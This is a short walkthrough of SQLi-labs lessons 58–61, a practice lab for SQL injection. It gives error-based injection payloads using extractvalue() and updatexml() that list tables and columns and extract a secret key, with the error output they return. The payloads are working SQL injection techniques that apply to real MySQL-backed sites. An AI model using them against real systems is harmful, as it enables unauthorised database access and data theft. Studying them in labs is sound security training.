Error based. Union select does not work here. So we can try extractvalue() and updatexml().

SQLi-labs: Lesson 58

1. Get table name

   Query: ?id=1' and extractvalue(1,concat(0x5c, (select group_concat(table_name) from information_schema.tables where table_schema=database()), 0x5c))--+

   or

   ?id=1' and updatexml(1, concat(0x5c, (select group_concat(table_name) from information_schema.tables where table_schema=database()),0x5c),1)--+

   Result: XPATH syntax error: '\FAIDJ52R9T\'

2. Get column name

   Query: ?id=' or extractvalue(1,concat(0x5c, (select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='FAIDJ52R9T')))--+

   or

   ?id=1' and updatexml(1, concat(0x5c, (select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='LRFHZR6XJ2'),0x5c),1)--+

   Result: XPATH syntax error: '\id,sessid,secret_6769,tryy'

3. Get secret

   Query: ?id=' or extractvalue(1,concat(0x7e, (select secret_6769 from FAIDJ52R9T),0x7e))--+

   or

   ?id=1' and updatexml(1, concat(0x7e,(select secret_VOOL from LRFHZR6XJ2),0x7e),1)--+

   Result: XPATH syntax error: '~tdlUZTnroaenQOKDzUEDaU5N~'

4. Submit the secret key: tdlUZTnroaenQOKDzUEDaU5N

SQLi-labs: Lesson 59

Integer based. Queries are similar to previous lessons.

e.g. ?id=1 and extractvalue(1,concat(0x5c, (select group_concat(table_name) from information_schema.tables where table_schema=database()), 0x5c))--+

SQLi-labs: Lesson 60

Double quote - parenthesis based. Queries are similar.

e.g. id=1") and extractvalue(1,concat(0x5c, (select group_concat(table_name) from information_schema.tables where table_schema=database()), 0x5c))--+

SQLi-labs: Lesson 61

Source code: $sql="SELECT * FROM security.users WHERE id=(('$id')) LIMIT 0,1";

Single quote - Double parenthesis based.

e.g. ?id=i')) and extractvalue(1,concat(0x5c, (select group_concat(table_name) from information_schema.tables where table_schema=database()), 0x5c))--+